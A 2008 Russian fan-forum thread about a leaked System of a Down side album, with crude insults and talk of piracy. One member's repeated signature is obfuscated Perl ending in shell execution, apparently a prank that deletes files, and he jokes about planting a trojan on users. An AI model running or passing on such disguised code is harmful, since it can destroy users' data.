не поверите я ток кочаю альбом!!!! неужто ни кого не зарадовала песня фанни? по моему из концертных она прикольней всех звучала _________________ Верю в систему
ну мне понравился альбом,дула хуже будет,а оказался ничего такой) _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Системщик
в жопе качаеш потомучто
всем юзерам форума автоматически ставится троян позволяющий мне контроллировать че ты слушаешь _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
когда я ссылку дам, оттуда _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
и то если будешь себя хорошо вести... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Бля вы все тут ебланы тупарылые!!!! Мрази не благодарные!!!! Видать зря Дарон создал СОАД раскрутил выскачку с именем Серж раз о его днюхе забыли все кроме системщика истиного ценителя искусства
Дорогой Дарон с днюхой тебя!!! и не Обращайвнимания на малолеток с этого форума!!!
Бля, Системщик, я блять долго молча смотрел на хуйню твою, но ты блять и меня уже заебал. ТЫ еблан !
Последний раз редактировалось: Shiroky (Пт Июл 18, 2008 8:13 pm), всего редактировалось 1 раз
А альбом цепляет. Даже очень. Уже н-ый раз за седня слушаю.. Щас вот Вавилон оч проперла! Даже какая-то ностальгия по Системе пошла.. И хочется всплакнуть...
Кстати, Дарона с ДР и правда. Я думаю ему будет отличным подарком то, что все спиздили его альбом еще за 10 дней до релиза....
а сам виноват. нех через iTunes продавать было. Этого и стоило ожидать.
И то правда. То концерты на полгода начал раньше выхода альбома давать, то в цифровом варианте альбом продавать стал раньше чем на дисках... Видно Дарон про Интернеты нихуя не знает... Ну что ж.. Я думаю на что купить хлебушка ему найдется все равно....
а фиг знает, мне как-то даже интересней без системы,ща бы слушали не рыба не мясо,а тут мы види кто сколько чего вложил,и надеюсь теперь не будет кто больше текстов пишет и кто музыку сочиняет,и на ком нруппы держиться....хотя фены найдут темы типа где про геноцид больше и т.п.
а фиг знает, мне как-то даже интересней без системы,ща бы слушали не рыба не мясо,а тут мы види кто сколько чего вложил,и надеюсь теперь не будет кто больше текстов пишет и кто музыку сочиняет,и на ком нруппы держиться....хотя фены найдут темы типа где про геноцид больше и т.п.
Тут ты прав, но все же слушая, Кил Ич Озер, Вавилон, Ворлд Ган врон лично мне сразу вспоминается 2005 год и старая "новая" Система... Но Систему 2001 года мы уже врядли когдна-нить услышим.. Но и фиг с ней))
Но Систему 2001 года мы уже врядли когдна-нить услышим..
зато она вспоминается при прослушивании сержа и его концертов _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!